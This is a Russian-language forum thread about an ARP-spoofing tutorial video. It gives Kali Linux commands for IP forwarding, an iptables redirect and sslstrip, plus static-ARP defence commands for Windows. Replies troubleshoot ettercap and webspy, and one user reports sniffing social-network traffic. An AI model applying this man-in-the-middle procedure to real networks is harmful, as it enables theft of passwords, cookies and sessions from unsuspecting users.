ARP-спуфинг. Взлом, защита и описание технологии

Уязвимости, взломы и способы защиты. Вирусы здесь не обсуждаются

Модераторы: Tim308, phantom

Ответить
Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4883
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 185
Откуда: Белгород
Контактная информация:
Статус: Не в сети

ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 26 апр 2014, 14:10

В этом видео я постарался подробно рассказать про так называемый ARP-спуфинг (arp-spoofing) и защиту от него. Это атака благодаря которой можно украсть пароль от сайта, перехватить cookie или сессии, скомпроментировать работу через защищенное подключение HTTPS и многое другое. В видео я использовал Kali Linux 1.0.6, ettercap-graphical, sslstrip, webspy и прочие инструменты. Вы также узнаете что такое ARP-протокол и MAC-адрес. Надеюсь что вам будет интересно!
Команды используемые в видео для KaliLinux
  1. Включаем форвардинг пакетов (ip-forwarding):

    Код: Выделить всё

    echo "1" > /proc/sys/net/ipv4/ip_forward
  2. Настраиваем IPtables для перенаправления интернет трафика. С 80 порта на любой другой, у меня это 8080 порт :

    Код: Выделить всё

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  3. Запускаем SSLstrip на просушку заданного нами порта:

    Код: Выделить всё

    sslstrip -l 8080
Создаем статический маршрут на интерфейс. Команды для Windows
  1. Первый вариант:

    Код: Выделить всё

    arp -s 192.168.1.1 xx-xx-xx-xx-xx-xx
  2. Если первый не сработал то вот второй вариант:

    Код: Выделить всё

    netsh interface ipv4 add neighbors "[i]Имя вашего подключения[/i]" "192.168.1.1" "xx-x-xx-xx-xx-xx"


DoC17
Интересующийся
Сообщения: 20
Зарегистрирован: 29 апр 2014, 19:29
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DoC17 » 29 апр 2014, 19:38

Пробовал делать через Back track 5r3 Не сработали последние две программы

*Вложенные изображения были удалены администратором по техническим причинам.

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4883
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 185
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 29 апр 2014, 20:18

DoC17 писал(а):Пробовал делать через Back track 5r3 Не сработали последние две программы
Это можно попробовать исправить следующими командами:

Переходим в директорию с sslstrip

Код: Выделить всё

cd /pentest/web/sslstrip
Запускаем SSLStrip в среде python

Код: Выделить всё

python sslstrip.py -l 8080
PS: Кстати было-бы неплохо если бы вы вместо скриншотов указывали проделанные вам команды в виде текста. Что-бы другим пользователям было удобнее искать.


DoC17
Интересующийся
Сообщения: 20
Зарегистрирован: 29 апр 2014, 19:29
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DoC17 » 30 апр 2014, 11:48

Спасибо.Заработало)))))Только правда получается слушать вконтакте и маил.ру


DoC17
Интересующийся
Сообщения: 20
Зарегистрирован: 29 апр 2014, 19:29
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DoC17 » 11 май 2014, 20:23

Ещё не всегда работает webspy, с чем это может быть связанно??

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4883
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 185
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 12 май 2014, 00:02

DoC17 писал(а):Ещё не всегда работает webspy, с чем это может быть связанно??
Без подробностей трудно сказать, но на самом деле webspy - это просто значительно упрощенный вариант программы WireShark и если насобирать логи через него (wireshark) то применив нужные фильтры в дальнейшем можно будет точно также как и в webspy узнать какие именно сайты открывались.

Но в webspy конечно все нагляднее и проще.


arp
Новичок
Сообщения: 1
Зарегистрирован: 12 май 2014, 13:26
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение arp » 12 май 2014, 14:01

Обезопасил свою сеть, а как насчет инструмента Interceptor-NG и безопасности доменных сетей, будут ролики?

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4883
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 185
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 12 май 2014, 14:57

arp писал(а):Обезопасил свою сеть
Вы прописали статический маршрут в отношении роутера или воспользовались другими вариантами? Спрашиваю потому, что если прописали маршрут, то имейте ввиду что вы защищены только от ARP-спуфинга в отношении роутера. Но при этом злоумышленник может подменить MAC-адрес другого компьютера в сети или-же удаленного сервера... Это просто к сведению.
arp писал(а):а как насчет инструмента Interceptor-NG и безопасности доменных сетей, будут ролики?
Про Intercepter-NG не уверен т.к. это еще один снифер, а про доменную сеть было-бы неплохо снять, но это сложный вопрос и с ним нужно долго разбираться что-бы получился нормальный ролик.


link
Новичок
Сообщения: 8
Зарегистрирован: 13 май 2014, 23:48
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение link » 13 май 2014, 23:54

Почему может не запускаться ettercap-graphical?
Установил на виртуальную машину последнею версию кали обновил и все равно не запускается...
:?: :?: :?: :?: :?:

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4883
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 185
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 14 май 2014, 00:11

link писал(а):Почему может не запускаться ettercap-graphical?
Установил на виртуальную машину последнею версию кали обновил и все равно не запускается...
:?: :?: :?: :?: :?:
Опишите подробнее. Что именно происходит после попытки запустить?
А вообще можно пользоваться ettercap-ng из терминала, для этого пропишите команду которая выведет справку по всем командам:

Код: Выделить всё

ettercap
или

Код: Выделить всё

ettercap-ng
точно не помню...

PS: Можете попробовать еще вот эти команды, на случай если у вас вдруг повреждены эти программы:

Установка Ettercap Graphical:

Код: Выделить всё

sudo apt-get install ettercap-gtk
Установка Ettercap запускаемой из терминала:

Код: Выделить всё

sudo apt-get install ettercap


link
Новичок
Сообщения: 8
Зарегистрирован: 13 май 2014, 23:48
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение link » 14 май 2014, 12:52

Я установил на виртуальную машину Kali новую попробовал запустить с меню ettercap-graphical не получилось обновился полностью... Попробовал запустить опять не получилось пакеты все на месте и зависимости тоже... Сам по себе вопрос думаю ясен...
Что делать...
З.Ы. Пробовал Кали на английском тоже самое

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4883
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 185
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 14 май 2014, 13:02

link писал(а):Я установил на виртуальную машину Kali новую попробовал запустить с меню ettercap-graphical не получилось обновился полностью... Попробовал запустить опять не получилось пакеты все на месте и зависимости тоже... Сам по себе вопрос думаю ясен...
Что делать...
Вы попробовали запустить не в графическом режиме а в терминальном (как я вам предлагал в предыдущем сообщении)?
link писал(а):З.Ы. Пробовал Кали на английском тоже самое
Она и так на Английском. Вы ее скачивали с оф. сайта по ссылке из первого поста?
link писал(а):Попробовал запустить опять не получилось пакеты все на месте и зависимости тоже...
Что конкретно "не получилось"? Ошибка какая-то или что?

И еще почитайте эти статьи... не знаю какую именно виртуалку вы используете, но там есть описание для VMware и VirtualBox - http://docs.kali.org/category/general-use


link
Новичок
Сообщения: 8
Зарегистрирован: 13 май 2014, 23:48
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение link » 14 май 2014, 13:51

Программа в граф режиме просто не запускается
В терминале пробовал получилось но в графический интерфейс не получилось с терминала
Виртуальная машина виртуал бокс
Саму систему Кали ставил на английском

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4883
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 185
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 14 май 2014, 15:16

link писал(а):В терминале пробовал получилось
А в терминале пользоваться не вариант? Там точно такие же возможности что и в графической версии.


link
Новичок
Сообщения: 8
Зарегистрирован: 13 май 2014, 23:48
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение link » 14 май 2014, 15:49

Команды надо посмотреть...
Какой командой посмотреть?)

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4883
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 185
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 14 май 2014, 16:23

link писал(а):Команды надо посмотреть...
Какой командой посмотреть?)
К абсолютному большинству команд Linux справку можно вызвать дописав после команды --help.
Например:

Код: Выделить всё

ettercap --help
А здесь статья с более конкретными примерами (имейте ввиду что регистр букв при вводе команд нужно соблюдать) - http://www.kioptrix.com/blog/ettercap-c ... ne-basics/


link
Новичок
Сообщения: 8
Зарегистрирован: 13 май 2014, 23:48
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение link » 14 май 2014, 19:20

А Sip и skype какими инструментами ?


link
Новичок
Сообщения: 8
Зарегистрирован: 13 май 2014, 23:48
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение link » 14 май 2014, 19:49

Решил проблему сам
ettercap -G в терминале и все)


Numb
Новичок
Сообщения: 2
Зарегистрирован: 23 июн 2014, 03:59
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение Numb » 27 июн 2014, 18:00

Все как в видео , но если бы не один нюанс который не дает мне покоя ! Суть собственно говоря в чем , а вижу я только 2 объекта 1)Пк и 2)Ноутбук а 3) Маршрутизатор Tenda W268R ---нету .То есть я дошел до того момента когда сканирую сеть и у меня находит только 2 объекта , а в видео там их там 3 ! Что я делаю не так ? :?

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4883
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 185
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 27 июн 2014, 22:26

Numb писал(а):То есть я дошел до того момента когда сканирую сеть и у меня находит только 2 объекта , а в видео там их там 3 ! Что я делаю не так ? :?
Скорее всего в вашем роутете активна функция "Предотвращение сетевых атак", привожу скриншот из инструкции к Tenda W268R
Tenda W268R Предотвращение сетевых атак.PNG
Если хотите поэксперементировать с сетью попробуйте отключить эту функцию на время. Я думаю с отключенной функцией "Prevent Network Attack" все получится.

Ответить

Вернуться в «Информационная безопасность»

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и 1 гость